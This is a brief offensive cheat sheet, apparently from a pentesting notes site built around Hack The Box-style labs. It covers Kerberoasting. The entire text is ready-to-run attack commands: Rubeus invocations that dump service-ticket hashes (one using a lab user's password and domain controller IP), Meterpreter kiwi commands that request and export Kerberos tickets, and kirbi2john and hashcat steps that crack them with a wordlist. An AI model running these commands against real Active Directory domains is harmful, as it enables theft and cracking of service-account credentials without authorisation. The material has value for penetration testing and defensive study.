Kerberoasting
(do not need admin/SYS)
Rubeus.exe kerberoast /outfile:hashes.txt /format:hashcatRubeus.exe kerberoast /user:mssql_svc /nowrap(with alternate credentials)
Rubeus.exe kerberoast /creduser:painters.htb\riley /credpassword:pass123 /outfile:hashes.txt /format:hashcat /domain:painters.htb /dc:192.168.110.55Using kiwi module
load kiwi
kiwi_cmd kerberos::ask /target:SQLSVC
kerberos_ticket_list
kiwi_cmd kerberos::list /exportConvert to Hashcat compatible file and crack
/usr/share/john/kirbi2john.py sql.kirbi > hash.txt
hashcat hash.txt --force /usr/share/wordlists/rockyou.txtLast updated